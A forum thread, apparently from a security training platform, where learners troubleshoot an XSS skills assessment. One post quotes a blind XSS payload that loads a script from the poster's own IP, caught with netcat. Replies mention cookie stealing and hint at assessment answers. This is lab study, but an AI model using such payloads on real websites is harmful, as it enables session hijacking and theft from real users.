Cross Site Scripting XSS Skills Assessment

I cannot get this assessment to work. I have discovered the comment section so have had my payload as: "><script src=http://MY-IP/field></script> and I receive nothing. If I manually do this and type my IP into the browser, my netcat receives the request, but on this website it just won't work.

I have been stuck for days and I just think there is a problem with this website, same with the session hijacking and phishing parts. For all of them I have had the correct payload that everyone else has used, but when I use it, it won't work.

Any help would be awesome, thanks :wink:

Hey! It's been a while since I have done that skill assessment, but this payload just looks like the one to identify the vulnerable field. I thought you needed to direct it at a script to get the cookie? I would take another look at your payload.

Feel free to DM me if you need more help.
-onthesauce

Yes, I am using this script to identify which field is vulnerable to XSS and then I’ll send my script to the field I receive a request from. Sadly I am not receiving anything on netcat, can’t seem to figure out why.

Hi, just remember to add the port you’re listening on in your script. If it’s correctly configured, it should respond 10 times out of 10 if it’s the correct field. I hope this helps, and good luck.

Hi, can you help me? I cannot resolve this question: "What type of XSS was found on the above server? “name only”" for the XSS Discovery section.
Can you help me?

Use ZAP attack proxy; the answer is the type found by ZAP.

Can someone help me with this one, please? I don't know what I'm doing wrong.